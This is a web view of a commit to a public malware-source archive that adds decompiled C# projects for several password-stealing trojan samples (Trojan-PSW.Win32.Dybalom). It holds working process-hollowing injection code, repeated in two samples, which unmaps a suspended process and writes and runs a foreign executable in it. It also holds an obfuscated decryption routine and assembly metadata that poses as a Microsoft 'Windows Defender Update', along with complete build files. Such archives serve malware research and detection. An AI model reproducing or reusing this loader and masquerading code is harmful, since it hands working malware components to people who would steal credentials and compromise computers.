daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-21 10:19:23 +00:00
Code Issues Projects Releases Wiki Activity

auto-decompiled msil via petikvx

Browse Source 
add
This commit is contained in:
vxunderground
2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-04bddf9aaebe7f8e5f190c73ce44f645c7449c8c5cdb6526b571391ce97f6b06/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-04bddf9aaebe7f8e5f190c73ce44f645c7449c8c5cdb6526b571391ce97f6b06/IX.cs
+127
View File
@@ -0,0 +1,127 @@
// Decompiled with JetBrains decompiler
// Type: IX
// Assembly: htngj_hk, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F32262B8-8B0E-4BCF-81B4-4FFA9BB46B72
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-PSW.Win32.Dybalom.gwl-04bddf9aaebe7f8e5f190c73ce44f645c7449c8c5cdb6526b571391ce97f6b06.exe
using System;
using System.Runtime.InteropServices;
using System.Text;
public class IX
{
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CreateProcess(
string appName,
StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
private static extern bool SetThreadContext(IntPtr t, uint[] c);
[DllImport("ntdll")]
private static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool ReadProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
int bufrSize,
ref IntPtr numRead);
[DllImport("kernel32.dll")]
private static extern uint ResumeThread(IntPtr hThread);
[DllImport("kernel32")]
private static extern IntPtr VirtualAllocEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
private static extern bool VirtualProtectEx(
IntPtr hProcess,
IntPtr lpAddress,
IntPtr dwSize,
uint flNewProtect,
ref uint lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
uint nSize,
out int lpNumberOfBytesWritten);
public static bool R(byte[] bytes, string surrogateProcess)
{
try
{
IntPtr zero1 = IntPtr.Zero;
IntPtr[] pInfo = new IntPtr[4];
byte[] sInfo = new byte[68];
int int32 = BitConverter.ToInt32(bytes, 60);
int int16 = (int) BitConverter.ToInt16(bytes, int32 + 6);
IntPtr nSize = new IntPtr(BitConverter.ToInt32(bytes, int32 + 84));
if (IX.CreateProcess((string) null, new StringBuilder(surrogateProcess), zero1, zero1, false, 4, zero1, (string) null, sInfo, pInfo))
{
uint[] numArray1 = new uint[179];
numArray1[0] = 65538U;
if (IX.GetThreadContext(pInfo[1], numArray1))
{
IntPtr baseAddr = new IntPtr((long) numArray1[41] + 8L);
IntPtr zero2 = IntPtr.Zero;
IntPtr bufrSize = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
if (IX.ReadProcessMemory(pInfo[0], baseAddr, ref zero2, (int) bufrSize, ref zero3) && IX.NtUnmapViewOfSection(pInfo[0], zero2) == 0U)
{
IntPtr num1 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 52));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 80));
IntPtr lpBaseAddress = IX.VirtualAllocEx(pInfo[0], num1, num2, 12288, 64);
int lpNumberOfBytesWritten;
IX.WriteProcessMemory(pInfo[0], lpBaseAddress, bytes, (uint) (int) nSize, out lpNumberOfBytesWritten);
int num3 = int16 - 1;
for (int index = 0; index <= num3; ++index)
{
int[] dst = new int[10];
Buffer.BlockCopy((Array) bytes, int32 + 248 + index * 40, (Array) dst, 0, 40);
byte[] numArray2 = new byte[dst[4] - 1 + 1];
Buffer.BlockCopy((Array) bytes, dst[5], (Array) numArray2, Convert.ToInt32((string) null, 2), numArray2.Length);
num2 = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
num1 = new IntPtr(numArray2.Length);
IX.WriteProcessMemory(pInfo[0], num2, numArray2, (uint) (int) num1, out lpNumberOfBytesWritten);
}
num2 = new IntPtr((long) numArray1[41] + 8L);
num1 = new IntPtr(4);
IX.WriteProcessMemory(pInfo[0], num2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint) (int) num1, out lpNumberOfBytesWritten);
numArray1[44] = (uint) (lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40));
IX.SetThreadContext(pInfo[1], numArray1);
}
}
int num = (int) IX.ResumeThread(pInfo[1]);
}
}
catch
{
return false;
}
return true;
}
}
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-04bddf9aaebe7f8e5f190c73ce44f645c7449c8c5cdb6526b571391ce97f6b06/Trojan-PSW.Win32.Dybalom.gwl.csproj
+36
View File
@@ -0,0 +1,36 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-PSW.Win32.Dybalom.gwl-04bddf9aaebe7f8e5f190c73ce44f645c7449c8c5cdb6526b571391ce97f6b06.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{EECA1923-B24D-41DF-9711-024C45F2B59D}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>htngj_hk</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="IX.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-04bddf9aaebe7f8e5f190c73ce44f645c7449c8c5cdb6526b571391ce97f6b06/Trojan-PSW.Win32.Dybalom.gwl.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "htngj_hk", "Trojan-PSW.Win32.Dybalom.gwl-04bddf9aaebe7f8e5f190c73ce44f645c7449c8c5cdb6526b571391ce97f6b06.csproj", "{EECA1923-B24D-41DF-9711-024C45F2B59D}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{EECA1923-B24D-41DF-9711-024C45F2B59D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{EECA1923-B24D-41DF-9711-024C45F2B59D}.Debug|Any CPU.Build.0 = Debug|Any CPU
{EECA1923-B24D-41DF-9711-024C45F2B59D}.Release|Any CPU.ActiveCfg = Release|Any CPU
{EECA1923-B24D-41DF-9711-024C45F2B59D}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-2eda97c03c7d80a9fcab10c2aef6f5e99486b52f17a07b2b973ea35e95765270/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-2eda97c03c7d80a9fcab10c2aef6f5e99486b52f17a07b2b973ea35e95765270/IX.cs
+127
View File
@@ -0,0 +1,127 @@
// Decompiled with JetBrains decompiler
// Type: IX
// Assembly: 46-dcrio, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: C9E84790-40DE-4FD0-B1D8-6D752394B661
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-2eda97c03c7d80a9fcab10c2aef6f5e99486b52f17a07b2b973ea35e95765270.exe
using System;
using System.Runtime.InteropServices;
using System.Text;
public class IX
{
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CreateProcess(
string appName,
StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
private static extern bool SetThreadContext(IntPtr t, uint[] c);
[DllImport("ntdll")]
private static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool ReadProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
int bufrSize,
ref IntPtr numRead);
[DllImport("kernel32.dll")]
private static extern uint ResumeThread(IntPtr hThread);
[DllImport("kernel32")]
private static extern IntPtr VirtualAllocEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
private static extern bool VirtualProtectEx(
IntPtr hProcess,
IntPtr lpAddress,
IntPtr dwSize,
uint flNewProtect,
ref uint lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
uint nSize,
out int lpNumberOfBytesWritten);
public static bool R(byte[] bytes, string surrogateProcess)
{
try
{
IntPtr zero1 = IntPtr.Zero;
IntPtr[] pInfo = new IntPtr[4];
byte[] sInfo = new byte[68];
int int32 = BitConverter.ToInt32(bytes, 60);
int int16 = (int) BitConverter.ToInt16(bytes, int32 + 6);
IntPtr nSize = new IntPtr(BitConverter.ToInt32(bytes, int32 + 84));
if (IX.CreateProcess((string) null, new StringBuilder(surrogateProcess), zero1, zero1, false, 4, zero1, (string) null, sInfo, pInfo))
{
uint[] numArray1 = new uint[179];
numArray1[0] = 65538U;
if (IX.GetThreadContext(pInfo[1], numArray1))
{
IntPtr baseAddr = new IntPtr((long) numArray1[41] + 8L);
IntPtr zero2 = IntPtr.Zero;
IntPtr bufrSize = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
if (IX.ReadProcessMemory(pInfo[0], baseAddr, ref zero2, (int) bufrSize, ref zero3) && IX.NtUnmapViewOfSection(pInfo[0], zero2) == 0U)
{
IntPtr num1 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 52));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 80));
IntPtr lpBaseAddress = IX.VirtualAllocEx(pInfo[0], num1, num2, 12288, 64);
int lpNumberOfBytesWritten;
IX.WriteProcessMemory(pInfo[0], lpBaseAddress, bytes, (uint) (int) nSize, out lpNumberOfBytesWritten);
int num3 = int16 - 1;
for (int index = 0; index <= num3; ++index)
{
int[] dst = new int[10];
Buffer.BlockCopy((Array) bytes, int32 + 248 + index * 40, (Array) dst, 0, 40);
byte[] numArray2 = new byte[dst[4] - 1 + 1];
Buffer.BlockCopy((Array) bytes, dst[5], (Array) numArray2, Convert.ToInt32((string) null, 2), numArray2.Length);
num2 = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
num1 = new IntPtr(numArray2.Length);
IX.WriteProcessMemory(pInfo[0], num2, numArray2, (uint) (int) num1, out lpNumberOfBytesWritten);
}
num2 = new IntPtr((long) numArray1[41] + 8L);
num1 = new IntPtr(4);
IX.WriteProcessMemory(pInfo[0], num2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint) (int) num1, out lpNumberOfBytesWritten);
numArray1[44] = (uint) (lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40));
IX.SetThreadContext(pInfo[1], numArray1);
}
}
int num = (int) IX.ResumeThread(pInfo[1]);
}
}
catch
{
return false;
}
return true;
}
}
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-2eda97c03c7d80a9fcab10c2aef6f5e99486b52f17a07b2b973ea35e95765270/Trojan-PSW.Win32.Dybalom.gwl.csproj
+36
View File
@@ -0,0 +1,36 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-2eda97c03c7d80a9fcab10c2aef6f5e99486b52f17a07b2b973ea35e95765270.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{BAF1FDD5-92B6-4629-8E69-C75120560E7D}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>46-dcrio</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="IX.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-2eda97c03c7d80a9fcab10c2aef6f5e99486b52f17a07b2b973ea35e95765270/Trojan-PSW.Win32.Dybalom.gwl.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "46-dcrio", "Trojan-PSW.Win32.Dybalom.gwl-2eda97c03c7d80a9fcab10c2aef6f5e99486b52f17a07b2b973ea35e95765270.csproj", "{BAF1FDD5-92B6-4629-8E69-C75120560E7D}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{BAF1FDD5-92B6-4629-8E69-C75120560E7D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{BAF1FDD5-92B6-4629-8E69-C75120560E7D}.Debug|Any CPU.Build.0 = Debug|Any CPU
{BAF1FDD5-92B6-4629-8E69-C75120560E7D}.Release|Any CPU.ActiveCfg = Release|Any CPU
{BAF1FDD5-92B6-4629-8E69-C75120560E7D}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560/AssemblyInfo.cs
+6
View File
@@ -0,0 +1,6 @@
using System.Reflection;
[assembly: AssemblyCompany("Microsoft Corporation")]
[assembly: AssemblyDescription("Windows Defender Update")]
[assembly: AssemblyCopyright("Microsoft Corporation")]
[assembly: AssemblyVersion("1.3.2.4")]
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560/FHQnUxOuBUcRwss.cs
+77
View File
@@ -0,0 +1,77 @@
// Decompiled with JetBrains decompiler
// Type: FHQnUxOuBUcRwss
// Assembly: windefender_upd-2, Version=1.3.2.4, Culture=neutral, PublicKeyToken=null
// MVID: 586226ED-1F78-4585-B234-14A26CF968DE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Text;
public class FHQnUxOuBUcRwss
{
private string rqHLNFetlWEGbEI;
public string TzTZhWCLMKPmtBe
{
get => this.rqHLNFetlWEGbEI;
set => this.rqHLNFetlWEGbEI = value;
}
public FHQnUxOuBUcRwss(string TzTZhWCLMKPmtBe)
{
this.rqHLNFetlWEGbEI = "";
this.TzTZhWCLMKPmtBe = TzTZhWCLMKPmtBe;
}
public FHQnUxOuBUcRwss()
{
this.rqHLNFetlWEGbEI = "";
this.TzTZhWCLMKPmtBe = "";
}
public string DbqjTCEYBFTdyMy(string CNHZIfPZfbnETac) => Encoding.Default.GetString(this.DbqjTCEYBFTdyMy(Encoding.Default.GetBytes(CNHZIfPZfbnETac)));
public byte[] DbqjTCEYBFTdyMy(byte[] CNHZIfPZfbnETac)
{
CNHZIfPZfbnETac = this.cyXPLXnDYMVsnRT(CNHZIfPZfbnETac, Encoding.Default.GetBytes(this.TzTZhWCLMKPmtBe));
byte[] numArray = new byte[CNHZIfPZfbnETac.Length - Convert.ToInt32(Conversions.ToString(10), 2) + 1];
object Counter;
object LoopForResult;
object CounterResult;
if (ObjectFlowControl.ForLoopControl.ForLoopInitObj(Counter, (object) (CNHZIfPZfbnETac.Length - Convert.ToInt32(Conversions.ToString(1), 2)), (object) Convert.ToInt32(Conversions.ToString(1), 2), (object) -Convert.ToInt32(Conversions.ToString(1), 2), ref LoopForResult, ref CounterResult))
{
do
{
numArray[Conversions.ToInteger(Operators.SubtractObject(CounterResult, (object) Convert.ToInt32(Conversions.ToString(1), 2)))] = this.YyVUvduhlLlwqJG(CNHZIfPZfbnETac[Conversions.ToInteger(CounterResult)], (short) -CNHZIfPZfbnETac[Conversions.ToInteger(Operators.SubtractObject(CounterResult, (object) Convert.ToInt32(Conversions.ToString(1), 2)))]);
}
while (ObjectFlowControl.ForLoopControl.ForNextCheckObj(CounterResult, LoopForResult, ref CounterResult));
}
return numArray;
}
private byte YyVUvduhlLlwqJG(byte DKRhIIXNQIgKomU, short JdULYiSRFFfoBdw)
{
while ((int) JdULYiSRFFfoBdw < Convert.ToInt32(Conversions.ToString(0), 2))
JdULYiSRFFfoBdw += (short) Convert.ToInt32(Conversions.ToString(100000000), 2);
return Convert.ToByte((int) (short) ((int) DKRhIIXNQIgKomU + (int) JdULYiSRFFfoBdw) % Convert.ToInt32(Conversions.ToString(100000000), 2));
}
private byte[] cyXPLXnDYMVsnRT(byte[] DKRhIIXNQIgKomU, byte[] lJEhjQWpxnTOONS)
{
object Counter;
object LoopForResult;
object CounterResult;
if (lJEhjQWpxnTOONS.Length != 0 && ObjectFlowControl.ForLoopControl.ForLoopInitObj(Counter, (object) Convert.ToInt32(Conversions.ToString(0), 2), (object) (DKRhIIXNQIgKomU.Length - Convert.ToInt32(Conversions.ToString(1), 2)), (object) 1, ref LoopForResult, ref CounterResult))
{
do
{
DKRhIIXNQIgKomU[Conversions.ToInteger(CounterResult)] = (byte) ((int) DKRhIIXNQIgKomU[Conversions.ToInteger(CounterResult)] ^ (int) this.YyVUvduhlLlwqJG(lJEhjQWpxnTOONS[Conversions.ToInteger(Operators.ModObject(CounterResult, (object) lJEhjQWpxnTOONS.Length))], (short) lJEhjQWpxnTOONS[(int) lJEhjQWpxnTOONS[Conversions.ToInteger(Operators.ModObject(CounterResult, (object) lJEhjQWpxnTOONS.Length))] % lJEhjQWpxnTOONS.Length]) ^ (int) lJEhjQWpxnTOONS[Conversions.ToInteger(Operators.ModObject(Operators.ModObject(Operators.AddObject(CounterResult, Operators.ModObject(CounterResult, (object) Convert.ToInt32(Conversions.ToString(111), 2))), (object) lJEhjQWpxnTOONS.Length), (object) lJEhjQWpxnTOONS.Length))]);
}
while (ObjectFlowControl.ForLoopControl.ForNextCheckObj(CounterResult, LoopForResult, ref CounterResult));
}
return DKRhIIXNQIgKomU;
}
public string cyXPLXnDYMVsnRT(string WSBPooPYkNgMjCb, string lJEhjQWpxnTOONS) => Encoding.Default.GetString(this.cyXPLXnDYMVsnRT(Encoding.Default.GetBytes(WSBPooPYkNgMjCb), Encoding.Default.GetBytes(lJEhjQWpxnTOONS)));
}
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560/Ghost.cs
+42
View File
@@ -0,0 +1,42 @@
// Decompiled with JetBrains decompiler
// Type: Ghost
// Assembly: windefender_upd-2, Version=1.3.2.4, Culture=neutral, PublicKeyToken=null
// MVID: 586226ED-1F78-4585-B234-14A26CF968DE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.exe
internal class Ghost
{
private int Current;
public string[] StringExclusion;
public string[] NameExclusion;
public int Numbers;
public long Equations;
public Ghost()
{
this.StringExclusion = new string[0];
this.NameExclusion = new string[0];
}
private void Store(string data)
{
if (data.Length != 0)
;
}
public void Process() => this.Current = 0;
private void ProcessStrings()
{
}
private void ProcessNames()
{
}
private void ProcessNumbers() => this.Equations += 6L;
private void ProcessNumber(int value, string result)
{
}
}
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560/H.resx
+220
View File
File diff suppressed because one or more lines are too long
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560/My/MyApplication.cs
+23
View File
@@ -0,0 +1,23 @@
// Decompiled with JetBrains decompiler
// Type: My.MyApplication
// Assembly: windefender_upd-2, Version=1.3.2.4, Culture=neutral, PublicKeyToken=null
// MVID: 586226ED-1F78-4585-B234-14A26CF968DE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.exe
using Microsoft.VisualBasic.ApplicationServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal class MyApplication : ApplicationBase
{
[DebuggerNonUserCode]
public MyApplication()
{
}
}
}
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560/My/MyComputer.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: My.MyComputer
// Assembly: windefender_upd-2, Version=1.3.2.4, Culture=neutral, PublicKeyToken=null
// MVID: 586226ED-1F78-4585-B234-14A26CF968DE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal class MyComputer : Computer
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyComputer()
{
}
}
}
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560/My/MyProject.cs
+113
View File
@@ -0,0 +1,113 @@
// Decompiled with JetBrains decompiler
// Type: My.MyProject
// Assembly: windefender_upd-2, Version=1.3.2.4, Culture=neutral, PublicKeyToken=null
// MVID: 586226ED-1F78-4585-B234-14A26CF968DE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[HideModuleName]
[StandardModule]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[DebuggerNonUserCode]
static MyProject()
{
}
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[EditorBrowsable(EditorBrowsableState.Never)]
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
internal sealed class MyWebServices
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
internal new Type GetType() => typeof (MyProject.MyWebServices);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyWebServices()
{
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[ComVisible(false)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public ThreadSafeObjectProvider()
{
}
}
}
}
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560/Trojan-PSW.Win32.Dybalom.gwl.csproj
+49
View File
@@ -0,0 +1,49 @@
